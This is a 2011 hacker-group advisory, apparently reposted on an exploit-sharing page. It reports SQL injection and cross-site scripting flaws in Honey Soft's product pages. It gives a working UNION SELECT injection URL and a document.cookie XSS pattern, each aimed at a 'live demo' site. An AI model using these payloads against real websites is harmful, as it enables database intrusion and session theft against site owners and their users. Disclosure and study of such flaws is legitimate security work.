扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 |
----------------------------------------------------------------------------------------- Honey Soft (detail.php?prod_detail=& products.php?catid=) SQL-i/XSS Multiple Vulnerabilities ----------------------------------------------------------------------------------------- +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= +=+=+=+=+=+= +=+=+= /\| || |__________________ _____ +=+=+= +=+=+=/\ | |__| |_____/ ______/ |_\| ____|\ \/ \/ / +=+=+= +=+=+= / /\ \| |__| |/_____/| | | |_) /| |__ \ \/ \/ /+=+=+= +=+=+=/ ____ \ || | | |_______| __\ \|__| \ / +=+=+= +=+=+= /_/\_\|| | |________/|_|\_\ | |_______\_____/_____ +=+=+= +=+=+= |_____________________|+=+=+= +=+=+=+=+=+= +=+=+=X-n3t - **RoAd_KiLlEr** - The|Denny<code> - EaglE EyE - The_1nv1s1bl3+=+=+= +=+=+=+=+=+= +=+=+=0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+= +=+=+=+=+=+= +=+=+= ....::: | ALBANIAN HACKING CREW | :::....2011+=+=+= +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 00 1########################################### 1 0 I'm **RoAd_KiLlEr**member from 1337 DAY Team 1 1########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+]TitleHoney Soft (detail.php?prod_detail=& products.php?catid=) SQL-i/XSS Multiple Vulnerabilities [+]Author**RoAd_KiLlEr** [+]Tested on Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: sukihack[at]gmail[dot]com [~] Home: http://1337day.com [~] Vendor: http://www.honeysoft.net/ ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+] Dork: No DOrk for Lamerz !! ========================================== [ I ].SQL-i Vulnerability =+=+=+=+=+=+=+=+=+ [+] Description: All the web sites that are developed by Honeysoft use the same script. But the script is prone to SQL inection. Input passed via the "prod_detail" parameter to detail.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. ========================================== [P0C]:http://127.0.0.1/path/detail.php?prod_detail=[SQL-Injection] [D3m0]:http://127.0.0.1/path/detail.php?prod_detail=[SQL-Injection] [L!v3 D3m0]: http://www.site.com/detail.php?prod_detail=369+union+select+1,2,3,4,@@version,6-- [ II ].XSS-Injection Vulnerability =+=+=+=+=+=+=+=+=+=+=+=+ [+] Description: Input passed via the "prod_detail=" parameter to detail.php and via the "products.php?catid=" parameter to products.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. ========================================================= [P0C]:http://127.0.0.1/path/detail.php?prod_detail=[XSS] [Atack Pattern]: "><script>alert(document.cookie)</script> [L!v3 D3m0]: http://www.site.com/detail.php?prod_detail="><script>alert(document.cookie)</script> [+] TIME TABLE: 26 March 2011 - Vulnerability discovered. 26 March 2011 - Vendor Notified. 26 March 2011 - Sent to vendor all data. 27 March 2011 - Vendor replied. 27 March 2011 - Advisory released. =========================================================================================== [!] Albanian Hacking Crew =========================================================================================== [!] **RoAd_KiLlEr** =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-n3t | The|DennY</code> | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers =========================================================================================== [!] Spec Th4nks:r0073r| indoushka | Sid3^effects | MaFFiTeRRoR | All1337day Members | And All My Friendz =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN =========================================================================================== |
体验盒子
